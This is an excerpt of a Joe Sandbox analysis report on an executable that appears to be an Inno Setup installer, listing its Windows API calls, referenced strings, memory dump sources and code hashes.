                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                              • , xrefs: 00453ACD
                                                                              • RegCreateKeyEx, xrefs: 00453ADF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2481121983-1280779767
                                                                              • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                              • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                              • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                              • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                              APIs
                                                                                • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                              • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                              • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                              • 73A25CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                              • API String ID: 170458502-2312673372
                                                                              • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                              • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                              • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                              • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                              • API String ID: 4190037839-37397897
                                                                              • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                              • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                              • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                              • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00462124
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                              • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                              • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                              • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F008
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                              • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                              • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                              • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                              • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                              • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance$FreeString
                                                                              • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                              • API String ID: 308859552-2052886881
                                                                              • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                              • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                              • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                              • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02113858,00000000), ref: 00458399
                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                              • API String ID: 2182916169-3012584893
                                                                              • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                              • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                              • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                              • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                              • API String ID: 1914119943-2711329623
                                                                              • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                              • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                              • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                              • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                              APIs
                                                                              • RectVisible.GDI32(?,?), ref: 00416E23
                                                                              • SaveDC.GDI32(?), ref: 00416E37
                                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                              • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                              • DeleteObject.GDI32(?), ref: 00416F32
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                              • DeleteObject.GDI32(?), ref: 00416F7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                              • String ID:
                                                                              • API String ID: 375863564-0
                                                                              • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                              • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                              • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                              • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$EnableItem$System
                                                                              • String ID:
                                                                              • API String ID: 3985193851-0
                                                                              • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                              • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                              • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                              • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                              APIs
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                              • API String ID: 390214022-3415521383
                                                                              • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                              • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                              • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                              • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                              • FreeLibrary.KERNEL32(030E0000), ref: 0047FFD8
                                                                              • SendNotifyMessageA.USER32(00010432,00000496,00002710,00000000), ref: 0048004A
                                                                              Strings
                                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                              • Deinitializing Setup., xrefs: 0047FE3A
                                                                              • Restarting Windows., xrefs: 00480025
                                                                              • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                              • DeinitializeSetup, xrefs: 0047FED5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$MessageNotifySend
                                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                              • API String ID: 3817813901-1884538726
                                                                              • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                              • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                              • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
